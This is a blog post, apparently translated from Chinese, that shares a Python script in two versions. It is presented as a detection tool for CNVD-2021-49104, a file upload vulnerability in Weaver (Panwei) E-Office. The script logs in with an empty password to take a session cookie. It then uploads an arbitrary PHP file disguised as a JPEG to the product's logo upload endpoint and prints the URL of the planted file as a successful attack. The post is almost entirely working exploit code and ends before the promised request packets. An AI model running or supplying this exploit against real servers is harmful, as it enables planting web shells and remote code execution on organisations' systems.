CNVD-2021-49104 detection script written by myself, friends in need can take a look
If you are interested in vulnerability recurrence, you can take a look at: CNVD-2021-49104 vulnerability recurrence (Panwei E-Office file upload vulnerability)_dreamthe's Blog-CSDN Blog
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# author: trance
# datetime: 2021/12/5 0005 15:54
import requests
from requests_toolbelt import MultipartEncoder
import sys
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Upgrade-Insecure-Requests': '1'
}
#请求头
proxies = {
"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"
}
#代码地址和端口
def cookieTest(url, headers, proxies):
url1 = '/login-new/logincheck.php'
#登录的url
fullurl1 = url+url1
try:
r1 = requests.post(fullurl1, headers=headers, proxies=proxies, data=d1)
#发送登录请求
#print(r1.headers)
ck1 = r1.headers["Set-Cookie"]
#获取响应头里面的set-cookie字段
ck2 = ck1.split(',')[2].split(';')[0]
#print(ck2)
ck3 = ck2.strip()
#对于字段内容进行提取PHPSESSID
return ck3
except Exception as e:
#捕捉异常
print(e)
def uploadTest(url, headers,file_name, file_path):
url2 = "/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId="
fullurl2 = url + url2
url3="/images/logo/logo-eoffice.php"
m = MultipartEncoder(
fields={
'Filedata': (file_name, open(file_path, 'rb'), 'image/jpeg')
})
#构造post提交数据
headers['Content-Type'] = m.content_type
#构造请求头的content—Type
try:
r2 = requests.post(fullurl2, headers=headers, proxies=proxies, data=m)
if r2.status_code == 200:
print(r2.text + '攻击成功可以访问文件上传地址:'+url+url3)
except Exception as e :
print(e)
if __name__ == '__main__':
url= sys.argv[1]
name = sys.argv[2]
d1 = {'USERNAME': name, 'PASSWORD': '', "USER_LANG": 'cn', 'VERIFY': ''}
#url = "http://win-08mtfbul1kp:8082"
file_name = 'test.php'
#上传的文件名
file_path = 'F:\\PycharmProjects\\test.php'
#上传的文件路径,需要根据自己文件存放路径进行修改哦
ck3 = cookieTest(url, headers, proxies)
#进行登录,获取到PHPSESSID,将其反倒函数外用ck3变量接收
headers['Cookie'] = ck3
#在请求头条件cookie
uploadTest(url, headers,file_name, file_path)
#上传指定文件函数
Instructions:
The original code has been optimized, you can refer to it
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# author: trance
# datetime: 2021/12/5 0005 15:54
import requests
from requests_toolbelt import MultipartEncoder
import argparse
def options():
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--user', dest='username',
help ='登录的账号名字')
parser.add_argument('-p', '--path', dest='file_path',
help ='上传文件的路径')
parser.add_argument('-n', '--name', dest='file_name',
help ='上传的文件名字')
parser.add_argument('-u', '--url', dest='url',
help ='检测的url')
parser.add_argument('-v', '--version', action='version', version='%(prog)s 1.0')
params = parser.parse_args()
return params.username, params.file_path, params.file_name, params.url
#将输入进来的参数接收返出去。
#命令行的参数,-s admin 要输入账号
#-p 后面是文件路径.....
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Upgrade-Insecure-Requests': '1'
}
#请求头
proxies = {
"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"
}
#代码地址和端口
#页面小画面
def usage():
print('''
へ /|
/\7 ∠_/
/ │ / /
│ Z _,< / /`ヽ
│ ヽ / 〉
Y ` / /
イ● 、 ● ⊂⊃〈 /
() へ | \〈
>ー 、_ ィ │ //
/ へ / ノ<| \\
ヽ_ノ (_/ │//
7 |/
>―r ̄ ̄`ー―_
''')
print('''工具描述及参数介绍:''')
print('''检测CNVD-2021-49104(泛微E-Office文件上传漏洞)''')
print('''案列展示:python "F:\PycharmProjects\pythonProject\options praser.py" -u http://win-08mtfbul1kp:8082 -s admin -p F:\\PycharmProjects\\test.php -n test.php''')
print('\n')
def cookieTest(url, headers, proxies,username):
url1 = '/login-new/logincheck.php'
#登录的url
fullurl1 = url+url1
d1 = {'USERNAME': username, 'PASSWORD': '', "USER_LANG": 'cn', 'VERIFY': ''}
try:
r1 = requests.post(fullurl1, headers=headers, proxies=proxies, data=d1)
#发送登录请求
if r1.status_code == 200:
print('登录成功,请上传脚本文件')
ck1 = r1.headers["Set-Cookie"]
#获取响应头里面的set-cookie字段
ck2 = ck1.split(',')[2].split(';')[0]
#print(ck2)
ck3 = ck2.strip()
#对于字段内容进行提取PHPSESSID
return ck3
except Exception as e:
#捕捉异常
print(e)
def uploadTest(url, headers,file_name, file_path):
url2 = "/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId="
fullurl2 = url + url2
url3="/images/logo/logo-eoffice.php"
m = MultipartEncoder(
fields={
'Filedata': (file_name, open(file_path, 'rb'), 'image/jpeg')
})
#构造post提交数据
headers['Content-Type'] = m.content_type
#构造请求头的content—Type
try:
r2 = requests.post(fullurl2, headers=headers, proxies=proxies, data=m)
if r2.status_code == 200:
print(r2.text + '攻击成功可以访问文件上传地址:'+url+url3)
except Exception as e :
print(e)
if __name__ == '__main__':
usage()
username, file_path, file_name, url = options()
#拿到响应数据
if url and username and file_path and file_name:
ck3 = cookieTest(url, headers, proxies, username)
#进行登录,获取到PHPSESSID,将其反倒函数外用ck3变量接收
headers['Cookie'] = ck3
#在请求头加上cookie
uploadTest(url, headers,file_name, file_path)
#上传指定文件函数
Instructions
The following are the two request packets